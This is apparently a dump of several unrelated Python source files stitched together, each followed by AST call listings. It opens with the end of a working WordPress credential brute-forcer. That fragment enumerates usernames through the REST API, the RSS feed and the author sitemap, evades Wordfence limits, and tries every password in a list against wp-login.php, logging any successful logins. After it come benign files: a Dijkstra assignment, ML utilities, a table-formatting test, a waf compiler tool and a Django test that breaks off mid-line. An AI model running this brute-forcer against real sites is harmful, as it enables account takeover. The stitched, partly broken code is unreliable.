response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: return response.text # Grab Wordpress Users via RSS Feed def grab_users_rssfeed(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: if "dc:creator" in response.text: return response.text # Check we can get to wp-admin login. def check_wpadmin(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict) if "Powered by WordPress" in response.text: if "wp-submit" in response.text: if "reCAPTCHA" not in response.text: return True else: return False else: return False else: return False # Check URL is wordpress def check_is_wp(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict) if "wp-content" in response.text: return True else: return False # Check if wordfence is installed as this limits the logins to 20 per ip def check_wordfence(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict) if "Wordfence Security - Firewall & Malware Scan" in response.text: return True else: return False # Test the logins def test_login (url,user,password,cnt,attempts): if str(cnt) == attempts: print("[-] Stopping as Wordfence will block your IP [-]") sys.exit(0) paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"} headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"} cookies = {"wordpress_test_cookie":"WP+Cookie+check"} response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False) if response.status_code == 503: print("[-] Website is giving 503 HTTP Status [-]") sys.exit(0) if response.status_code == 502: print("[-] Website is giving 502 HTTP Status [-]") sys.exit(0) if response.status_code == 403: print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]") sys.exit(0) if "Google Authenticator code" in response.text: print("[-] 2FA is enabled Sorry [-]") sys.exit(0) if "wordpress_logged_in" in response.headers['Set-Cookie']: print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]") text_file = open("found.txt", "a") text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n") text_file.close() sys.exit(0) else: print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]") cnt += 1 return cnt def count_pass(passfile): count = 0 with open(passfile, 'r') as f: for line in f: count += 1 f.close() return str(count) # Dont no body like dupes. def remove_dupes(): lines_seen = set() outfile = open("users.txt", "w") for line in open("rssusers.txt", "r"): if line not in lines_seen: outfile.write(line) lines_seen.add(line) outfile.close() def attack_restapi(url,attempts,userdata,passfile): for id in userdata: user = id['slug'] cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() def attack_rssfeed(url,attempts,userdata,passfile): users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata) if os.path.exists("rssusers.txt"): os.remove("rssusers.txt") if os.path.exists("users.txt"): os.remove("users.txt") for user in users: u = user.replace("[CDATA[","") text_file = open("rssusers.txt", "a") text_file.write(""+str(u)+"\n") text_file.close() remove_dupes() with open("users.txt", 'r') as f: for line in f: user = line.strip() cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as b: for line in b: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() b.close() def attack_sitemap(url,attempts,userdata,passfile): auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata) for user in auth: thisuser = user[1] h = thisuser.split('/') user = h[4] cnt = 1 with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() # Time For Some Machine Learning Quality IF statements. def basic_checks(url): if check_is_wp(url): if check_wpadmin(url): return True else: return False else: return False if basic_checks(url): print("[+] Confirmed Wordpress Website [+]") else: print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]") sys.exit(0) if os.path.isfile(passfile) and os.access(passfile, os.R_OK): print("[+] Password List Used: "+passfile+" [+]") else: print("[-] Either the file is missing or not readable [-]") sys.exit(0) # Method Value for which method to enumerate users from method = "None" attempts = "None" # Which method to use for enumeration if grab_users_api(url): print("[+] Users found via Rest API [-]") method = "restapi" if grab_users_rssfeed(url) and method == "None": print("[+] Users found via RSS Feed [+]") method = "rss" if grab_users_sitemap(url) and method == "None": print("[+] Users found via Authors Sitemap [-]") method = "sitemap" if method == "None": print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]") sys.exit(0) if check_wordfence(url): print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]") attempts = "20" # Kick off Parsing and attacking if method == "restapi": userdata = grab_users_api(url) attack_restapi(url,attempts,userdata,passfile) if method == "rss": userdata = grab_users_rssfeed(url) attack_rssfeed(url,attempts,userdata,passfile) if method == "sitemap": userdata = grab_users_sitemap(url) attack_sitemap(url,attempts,userdata,passfile)
[((16, 0, 16, 66), 'requests.packages.urllib3.disable_warnings', 'requests.packages.urllib3.disable_warnings', ({(16, 43, 16, 65): 'InsecureRequestWarning'}, {}), '(InsecureRequestWarning)', False, 'import requests\n'), ((17, 10, 17, 28), 'requests.Session', 'requests.Session', ({}, {}), '()', False, 'import requests\n'), ((20, 9, 20, 34), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((208, 8, 208, 52), 're.findall', 're.findall', ({(208, 19, 208, 42): '"""(<loc>(.*?)</loc>)\\\\s"""', (208, 43, 208, 51): 'userdata'}, {}), "('(<loc>(.*?)</loc>)\\\\s', userdata)", False, 'import re\n'), ((238, 1, 238, 12), 'sys.exit', 'sys.exit', ({(238, 10, 238, 11): '(0)'}, {}), '(0)', False, 'import sys\n'), ((244, 4, 244, 15), 'sys.exit', 'sys.exit', ({(244, 13, 244, 14): '(0)'}, {}), '(0)', False, 'import sys\n'), ((265, 1, 265, 12), 'sys.exit', 'sys.exit', ({(265, 10, 265, 11): '(0)'}, {}), '(0)', False, 'import sys\n'), ((114, 2, 114, 13), 'sys.exit', 'sys.exit', ({(114, 11, 114, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((121, 2, 121, 13), 'sys.exit', 'sys.exit', ({(121, 11, 121, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((124, 2, 124, 13), 'sys.exit', 'sys.exit', ({(124, 11, 124, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((127, 2, 127, 13), 'sys.exit', 'sys.exit', ({(127, 11, 127, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((130, 2, 130, 13), 'sys.exit', 'sys.exit', ({(130, 11, 130, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((137, 2, 137, 13), 'sys.exit', 'sys.exit', ({(137, 11, 137, 12): '(0)'}, {}), '(0)', False, 'import sys\n'), ((49, 12, 49, 40), 'json.loads', 'json.loads', ({(49, 23, 49, 39): 'response.content'}, {}), '(response.content)', False, 'import json\n'), ((180, 9, 180, 57), 're.compile', 're.compile', ({(180, 20, 180, 56): '"""<dc:creator><!(.+?)]]></dc:creator"""'}, {}), "('<dc:creator><!(.+?)]]></dc:creator')", False, 'import re\n')]
liaoaoyuan97/standford_algorithms_specialization
graph_search/week2/assignment_dijkstra_shortest_paths.py
2914fdd397ce895d986ac855e78afd7a51ceff68
import heapq import time from os import path from math import floor class Heap: def __init__(self): self.size = 0 self.array = [] self.v2index_map = {} def __get_parent_index(self, idx): return int(floor((idx - 1) / 2)) def __get_left_child_index(self, idx): return 2 * idx + 1 def __get_right_child_index(self, idx): return 2 * idx + 2 def __swap_value(self, i, j): t = self.array[i] self.v2index_map[t[0]] = j self.v2index_map[self.array[j][0]] = i self.array[i] = self.array[j] self.array[j] = t def __bubble_up(self, idx): parent_idx = self.__get_parent_index(idx) while parent_idx >= 0: if self.array[parent_idx][1] <= self.array[idx][1]: break self.__swap_value(parent_idx, idx) idx = parent_idx parent_idx = self.__get_parent_index(idx) def __bubble_down(self, idx): left_idx = self.__get_left_child_index(idx) right_idx = self.__get_right_child_index(idx) while left_idx < self.size or right_idx < self.size: min_idx = left_idx if left_idx >= self.size or (right_idx < self.size and self.array[right_idx][1] < self.array[left_idx][1]): min_idx = right_idx if self.array[idx][1] < self.array[min_idx][1]: break self.__swap_value(idx, min_idx) idx = min_idx left_idx = self.__get_left_child_index(idx) right_idx = self.__get_right_child_index(idx) def get_vertex_key(self, v_id): return self.array[self.v2index_map[v_id]][1] def pop(self): if self.size < 1: raise IndexError min_node = self.array[0] self.size = self.size - 1 self.__swap_value(0, self.size) self.array.pop() if self.size > 1: self.__bubble_down(0) del self.v2index_map[min_node[0]] return min_node def insert(self, node): self.array.append(node) self.v2index_map[node[0]] = self.size self.size = self.size + 1 if self.size > 1: self.__bubble_up(self.size - 1) def modify_key(self, v_id, update_val): idx = self.v2index_map[v_id] self.array[idx] = (v_id, update_val) parent_idx = self.__get_parent_index(idx) if parent_idx >= 0 and self.array[idx][1] < self.array[parent_idx][1]: self.__bubble_up(idx) else: self.__bubble_down(idx) def read_graph(filename): graph = dict() with open(path.join('.', filename), 'r') as f: for row in f.readlines(): edges = row.strip('\t\n').split('\t') s = int(edges[0]) graph[s] = [] for i in range(1, len(edges)): edge = edges[i].split(',') graph[s].append((int(edge[0]), int(edge[1]))) return graph def get_shortest_paths_heapq(graph): heap = [] heapq.heappush(heap, (0, 1)) # (dj_score, vertex_id) distances = {i: 1000000 for i in graph} distances[1] = 0 X = [] while heap: cur_distance, cur_v = heapq.heappop(heap) if cur_distance > distances[cur_v]: continue # added to X X.append(cur_v) for neighbor, weight in graph[cur_v]: dj_score = cur_distance + weight if dj_score < distances[neighbor]: distances[neighbor] = dj_score heapq.heappush(heap, (dj_score, neighbor)) return distances, X def get_shortest_paths_self_defined_heap(graph): heap = Heap() heap.insert((1, 0)) # (vertex_id, dj_score) for v in graph: if v != 1: heap.insert((v, 1000000)) shortest_paths = dict() n_v = len(graph) while len(shortest_paths) < n_v: assert len(shortest_paths) + heap.size == n_v cur_v, v_score = heap.pop() shortest_paths[cur_v] = v_score for neighbor, weight in graph[cur_v]: dj_score = v_score + weight # import pdb;pdb.set_trace() if neighbor not in shortest_paths and dj_score < heap.get_vertex_key(neighbor): heap.modify_key(neighbor, dj_score) return shortest_paths if __name__ == "__main__": # test case 1, output: {1: 0, 2: 1, 3: 2, 4: 2, 5: 3, 6: 4} # graph = { # 1: [(6, 7), (5, 3), (2, 1), (4, 2), (3, 3)], # 2: [(1, 1), (3, 1), (4, 1), (6, 6)], # 3: [(1, 3), (2, 1), (6, 2)], # 4: [(2, 1), (1, 2), (6, 5)], # 5: [(1, 3), (6, 3)], # 6: [(1, 7), (3, 2), (2, 6), (4, 5), (5, 3)] # } graph = read_graph("Dijkstra.txt") dedup_edges = set() for k, _ in graph.items(): for v in _: dedup_edges.add((k, v[0], v[1])) dedup_edges.add((v[0], k, v[1])) assert len(dedup_edges) == sum([len(e) for e in graph.values()]) # graph = {} # heap = Heap() # heap.insert((1,0)) # heap.insert((2,0)) # heap.pop() start_t = time.time() min_distances,X = get_shortest_paths_heapq(graph) print(time.time() - start_t) # print(min_distances) e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197] print(",".join([str(int(min_distances[i])) for i in e])) start_t = time.time() min_distances = get_shortest_paths_self_defined_heap(graph, X) print(time.time() - start_t) # print(min_distances) e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197] print(",".join([str(int(min_distances[i])) for i in e]))
[((114, 4, 114, 32), 'heapq.heappush', 'heapq.heappush', ({(114, 19, 114, 23): 'heap', (114, 25, 114, 31): '(0, 1)'}, {}), '(heap, (0, 1))', False, 'import heapq\n'), ((188, 14, 188, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((196, 14, 196, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((120, 30, 120, 49), 'heapq.heappop', 'heapq.heappop', ({(120, 44, 120, 48): 'heap'}, {}), '(heap)', False, 'import heapq\n'), ((14, 19, 14, 39), 'math.floor', 'floor', ({(14, 25, 14, 38): '((idx - 1) / 2)'}, {}), '((idx - 1) / 2)', False, 'from math import floor\n'), ((99, 14, 99, 38), 'os.path.join', 'path.join', ({(99, 24, 99, 27): '"""."""', (99, 29, 99, 37): 'filename'}, {}), "('.', filename)", False, 'from os import path\n'), ((190, 10, 190, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((198, 10, 198, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((131, 16, 131, 58), 'heapq.heappush', 'heapq.heappush', ({(131, 31, 131, 35): 'heap', (131, 37, 131, 57): '(dj_score, neighbor)'}, {}), '(heap, (dj_score, neighbor))', False, 'import heapq\n')]
huimlight/SoftTeacher
ssod/utils/structure_utils.py
97064fbcce1ab87b40977544ba7a9c488274d66f
import warnings from collections import Counter, Mapping, Sequence from numbers import Number from typing import Dict, List import numpy as np import torch from mmdet.core.mask.structures import BitmapMasks from torch.nn import functional as F _step_counter = Counter() def list_concat(data_list: List[list]): if isinstance(data_list[0], torch.Tensor): return torch.cat(data_list) else: endpoint = [d for d in data_list[0]] for i in range(1, len(data_list)): endpoint.extend(data_list[i]) return endpoint def sequence_concat(a, b): if isinstance(a, Sequence) and isinstance(b, Sequence): return a + b else: return None def dict_concat(dicts: List[Dict[str, list]]): return {k: list_concat([d[k] for d in dicts]) for k in dicts[0].keys()} def dict_fuse(obj_list, reference_obj): if isinstance(reference_obj, torch.Tensor): return torch.stack(obj_list) return obj_list def dict_select(dict1: Dict[str, list], key: str, value: str): flag = [v == value for v in dict1[key]] return { k: dict_fuse([vv for vv, ff in zip(v, flag) if ff], v) for k, v in dict1.items() } def dict_split(dict1, key): group_names = list(set(dict1[key])) dict_groups = {k: dict_select(dict1, key, k) for k in group_names} return dict_groups def dict_sum(a, b): if isinstance(a, dict): assert isinstance(b, dict) return {k: dict_sum(v, b[k]) for k, v in a.items()} elif isinstance(a, list): assert len(a) == len(b) return [dict_sum(aa, bb) for aa, bb in zip(a, b)] else: return a + b def zero_like(tensor_pack, prefix=""): if isinstance(tensor_pack, Sequence): return [zero_like(t) for t in tensor_pack] elif isinstance(tensor_pack, Mapping): return {prefix + k: zero_like(v) for k, v in tensor_pack.items()} elif isinstance(tensor_pack, torch.Tensor): return tensor_pack.new_zeros(tensor_pack.shape) elif isinstance(tensor_pack, np.ndarray): return np.zeros_like(tensor_pack) else: warnings.warn("Unexpected data type {}".format(type(tensor_pack))) return 0 def pad_stack(tensors, shape, pad_value=255): tensors = torch.stack( [ F.pad( tensor, pad=[0, shape[1] - tensor.shape[1], 0, shape[0] - tensor.shape[0]], value=pad_value, ) for tensor in tensors ] ) return tensors def result2bbox(result): num_class = len(result) bbox = np.concatenate(result) if bbox.shape[0] == 0: label = np.zeros(0, dtype=np.uint8) else: label = np.concatenate( [[i] * len(result[i]) for i in range(num_class) if len(result[i]) > 0] ).reshape((-1,)) return bbox, label def result2mask(result): num_class = len(result) mask = [np.stack(result[i]) for i in range(num_class) if len(result[i]) > 0] if len(mask) > 0: mask = np.concatenate(mask) else: mask = np.zeros((0, 1, 1)) return BitmapMasks(mask, mask.shape[1], mask.shape[2]), None def sequence_mul(obj, multiplier): if isinstance(obj, Sequence): return [o * multiplier for o in obj] else: return obj * multiplier def is_match(word, word_list): for keyword in word_list: if keyword in word: return True return False def weighted_loss(loss: dict, weight, ignore_keys=[], warmup=0): _step_counter["weight"] += 1 lambda_weight = ( lambda x: x * (_step_counter["weight"] - 1) / warmup if _step_counter["weight"] <= warmup else x ) if isinstance(weight, Mapping): for k, v in weight.items(): for name, loss_item in loss.items(): if (k in name) and ("loss" in name): loss[name] = sequence_mul(loss[name], lambda_weight(v)) elif isinstance(weight, Number): for name, loss_item in loss.items(): if "loss" in name: if not is_match(name, ignore_keys): loss[name] = sequence_mul(loss[name], lambda_weight(weight)) else: loss[name] = sequence_mul(loss[name], 0.0) else: raise NotImplementedError() return loss
[((11, 16, 11, 25), 'collections.Counter', 'Counter', ({}, {}), '()', False, 'from collections import Counter, Mapping, Sequence\n'), ((98, 11, 98, 33), 'numpy.concatenate', 'np.concatenate', ({(98, 26, 98, 32): 'result'}, {}), '(result)', True, 'import numpy as np\n'), ((16, 15, 16, 35), 'torch.cat', 'torch.cat', ({(16, 25, 16, 34): 'data_list'}, {}), '(data_list)', False, 'import torch\n'), ((38, 15, 38, 36), 'torch.stack', 'torch.stack', ({(38, 27, 38, 35): 'obj_list'}, {}), '(obj_list)', False, 'import torch\n'), ((100, 16, 100, 43), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((110, 12, 110, 31), 'numpy.stack', 'np.stack', ({(110, 21, 110, 30): 'result[i]'}, {}), '(result[i])', True, 'import numpy as np\n'), ((112, 15, 112, 35), 'numpy.concatenate', 'np.concatenate', ({(112, 30, 112, 34): 'mask'}, {}), '(mask)', True, 'import numpy as np\n'), ((114, 15, 114, 34), 'numpy.zeros', 'np.zeros', ({(114, 24, 114, 33): '(0, 1, 1)'}, {}), '((0, 1, 1))', True, 'import numpy as np\n'), ((115, 11, 115, 58), 'mmdet.core.mask.structures.BitmapMasks', 'BitmapMasks', ({(115, 23, 115, 27): 'mask', (115, 29, 115, 42): 'mask.shape[1]', (115, 44, 115, 57): 'mask.shape[2]'}, {}), '(mask, mask.shape[1], mask.shape[2])', False, 'from mmdet.core.mask.structures import BitmapMasks\n'), ((84, 12, 88, 13), 'torch.nn.functional.pad', 'F.pad', (), '', True, 'from torch.nn import functional as F\n'), ((75, 15, 75, 41), 'numpy.zeros_like', 'np.zeros_like', ({(75, 29, 75, 40): 'tensor_pack'}, {}), '(tensor_pack)', True, 'import numpy as np\n')]
zzl0/cli_helpers
tests/tabular_output/test_terminaltables_adapter.py
266645937423225bdb636ef6aa659f1a40ceec5f
# -*- coding: utf-8 -*- """Test the terminaltables output adapter.""" from __future__ import unicode_literals from textwrap import dedent import pytest from cli_helpers.compat import HAS_PYGMENTS from cli_helpers.tabular_output import terminaltables_adapter if HAS_PYGMENTS: from pygments.style import Style from pygments.token import Token def test_terminal_tables_adapter(): """Test the terminaltables output adapter.""" data = [['abc', 1], ['d', 456]] headers = ['letters', 'number'] output = terminaltables_adapter.adapter( iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ +---------+--------+ | letters | number | +---------+--------+ | abc | 1 | | d | 456 | +---------+--------+''') @pytest.mark.skipif(not HAS_PYGMENTS, reason='requires the Pygments library') def test_style_output_table(): """Test that *style_output_table()* styles the output table.""" class CliStyle(Style): default_style = "" styles = { Token.Output.TableSeparator: '#ansired', } headers = ['h1', 'h2'] data = [['观音', '2'], ['Ποσειδῶν', 'b']] style_output_table = terminaltables_adapter.style_output_table('ascii') style_output_table(data, headers, style=CliStyle) output = terminaltables_adapter.adapter(iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ \x1b[31;01m+\x1b[39;00m''' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m''' + ''' h2 \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m''' + ''' 2 \x1b[31;01m|\x1b[39;00m \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m''' + ''' b \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '\x1b[31;01m+\x1b[39;00m')
[((32, 1, 32, 77), 'pytest.mark.skipif', 'pytest.mark.skipif', (), '', False, 'import pytest\n'), ((43, 25, 43, 75), 'cli_helpers.tabular_output.terminaltables_adapter.style_output_table', 'terminaltables_adapter.style_output_table', ({(43, 67, 43, 74): '"""ascii"""'}, {}), "('ascii')", False, 'from cli_helpers.tabular_output import terminaltables_adapter\n'), ((23, 32, 29, 32), 'textwrap.dedent', 'dedent', ({(23, 39, 29, 31): '""" +---------+--------+\n | letters | number |\n +---------+--------+\n | abc | 1 |\n | d | 456 |\n +---------+--------+"""'}, {}), '(\n """ +---------+--------+\n | letters | number |\n +---------+--------+\n | abc | 1 |\n | d | 456 |\n +---------+--------+"""\n )', False, 'from textwrap import dedent\n'), ((48, 32, 69, 34), 'textwrap.dedent', 'dedent', ({(48, 39, 69, 33): '(\' \\x1b[31;01m+\\x1b[39;00m\' + (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 +\n \'\\x1b[31;01m+\\x1b[39;00m\' + \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m"""\n + \' h2 \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' +\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m"""\n +\n """ 2 \x1b[31;01m|\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m"""\n + \' b \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' +\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) + \'\\x1b[31;01m+\\x1b[39;00m\')'}, {}), '(\' \\x1b[31;01m+\\x1b[39;00m\' + (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 +\n \'\\x1b[31;01m+\\x1b[39;00m\' + \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m"""\n + \' h2 \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' +\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) +\n """\x1b[31;01m+\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m"""\n +\n """ 2 \x1b[31;01m|\x1b[39;00m\n \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m"""\n + \' b \\x1b[31;01m|\\x1b[39;00m\\n \' + \'\\x1b[31;01m+\\x1b[39;00m\' +\n (\'\\x1b[31;01m-\\x1b[39;00m\' * 10 + \'\\x1b[31;01m+\\x1b[39;00m\' + \n \'\\x1b[31;01m-\\x1b[39;00m\' * 4) + \'\\x1b[31;01m+\\x1b[39;00m\')', False, 'from textwrap import dedent\n')]
jeikabu/lumberyard
dev/Tools/build/waf-1.7.13/waflib/extras/fc_xlf.py
07228c605ce16cbf5aaa209a94a3cb9d6c1a4115
#! /usr/bin/env python # encoding: utf-8 # harald at klimachs.de import re from waflib import Utils,Errors from waflib.Tools import fc,fc_config,fc_scan from waflib.Configure import conf from waflib.Tools.compiler_fc import fc_compiler fc_compiler['aix'].insert(0, 'fc_xlf') @conf def find_xlf(conf): """Find the xlf program (will look in the environment variable 'FC')""" fc = conf.find_program(['xlf2003_r', 'xlf2003', 'xlf95_r', 'xlf95', 'xlf90_r', 'xlf90', 'xlf_r', 'xlf'], var='FC') fc = conf.cmd_to_list(fc) conf.get_xlf_version(fc) conf.env.FC_NAME='XLF' @conf def xlf_flags(conf): v = conf.env v['FCDEFINES_ST'] = '-WF,-D%s' v['FCFLAGS_fcshlib'] = ['-qpic=small'] v['FCFLAGS_DEBUG'] = ['-qhalt=w'] v['LINKFLAGS_fcshlib'] = ['-Wl,-shared'] @conf def xlf_modifier_platform(conf): dest_os = conf.env['DEST_OS'] or Utils.unversioned_sys_platform() xlf_modifier_func = getattr(conf, 'xlf_modifier_' + dest_os, None) if xlf_modifier_func: xlf_modifier_func() @conf def get_xlf_version(conf, fc): """Get the compiler version""" cmd = fc + ['-qversion'] try: out, err = conf.cmd_and_log(cmd, output=0) except Errors.WafError: conf.fatal('Could not find xlf %r' % cmd) for v in (r"IBM XL Fortran.* V(?P<major>\d*)\.(?P<minor>\d*)",): version_re = re.compile(v, re.I).search match = version_re(out or err) if match: k = match.groupdict() conf.env['FC_VERSION'] = (k['major'], k['minor']) break else: conf.fatal('Could not determine the XLF version.') def configure(conf): conf.find_xlf() conf.find_ar() conf.fc_flags() conf.fc_add_flags() conf.xlf_flags() conf.xlf_modifier_platform()
[((17, 6, 17, 115), 'waflib.Configure.conf.find_program', 'conf.find_program', (), '', False, 'from waflib.Configure import conf\n'), ((18, 6, 18, 26), 'waflib.Configure.conf.cmd_to_list', 'conf.cmd_to_list', ({(18, 23, 18, 25): 'fc'}, {}), '(fc)', False, 'from waflib.Configure import conf\n'), ((19, 1, 19, 25), 'waflib.Configure.conf.get_xlf_version', 'conf.get_xlf_version', ({(19, 22, 19, 24): 'fc'}, {}), '(fc)', False, 'from waflib.Configure import conf\n'), ((58, 1, 58, 16), 'waflib.Configure.conf.find_xlf', 'conf.find_xlf', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((59, 1, 59, 15), 'waflib.Configure.conf.find_ar', 'conf.find_ar', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((60, 1, 60, 16), 'waflib.Configure.conf.fc_flags', 'conf.fc_flags', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((61, 1, 61, 20), 'waflib.Configure.conf.fc_add_flags', 'conf.fc_add_flags', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((62, 1, 62, 17), 'waflib.Configure.conf.xlf_flags', 'conf.xlf_flags', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((63, 1, 63, 29), 'waflib.Configure.conf.xlf_modifier_platform', 'conf.xlf_modifier_platform', ({}, {}), '()', False, 'from waflib.Configure import conf\n'), ((32, 34, 32, 66), 'waflib.Utils.unversioned_sys_platform', 'Utils.unversioned_sys_platform', ({}, {}), '()', False, 'from waflib import Utils, Errors\n'), ((43, 13, 43, 44), 'waflib.Configure.conf.cmd_and_log', 'conf.cmd_and_log', (), '', False, 'from waflib.Configure import conf\n'), ((55, 2, 55, 52), 'waflib.Configure.conf.fatal', 'conf.fatal', ({(55, 13, 55, 51): '"""Could not determine the XLF version."""'}, {}), "('Could not determine the XLF version.')", False, 'from waflib.Configure import conf\n'), ((45, 2, 45, 43), 'waflib.Configure.conf.fatal', 'conf.fatal', ({(45, 13, 45, 42): "('Could not find xlf %r' % cmd)"}, {}), "('Could not find xlf %r' % cmd)", False, 'from waflib.Configure import conf\n'), ((48, 15, 48, 34), 're.compile', 're.compile', ({(48, 26, 48, 27): 'v', (48, 29, 48, 33): 're.I'}, {}), '(v, re.I)', False, 'import re\n')]
MeGustas-5427/SQL_Tutorials
tutorials/create_table/tests.py
627372c2d5d8656d72645830c9a1fae1df278fc7
#!/usr/bin/python3 # -*- coding:utf-8 -*- # __author__ = '__MeGustas__' from django.test import TestCase from django.db import connection from tutorials.create_table.models import * # Create your tests here. class TestHealthFile(TestCase): def setUp(self): cursor = connection.cursor() # Populate Customers table cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \ VALUES('1000000001', 'Village Toys', '200 Maple Lane', 'Detroit', 'MI', '44444', 'USA', 'John Smith', '[email protected]');") cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \ VALUES('1000000002', 'Kids Place', '333 South Lake Drive', 'Columbus', 'OH', '43333', 'USA', 'Michelle Green');") cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \ VALUES('1000000003', 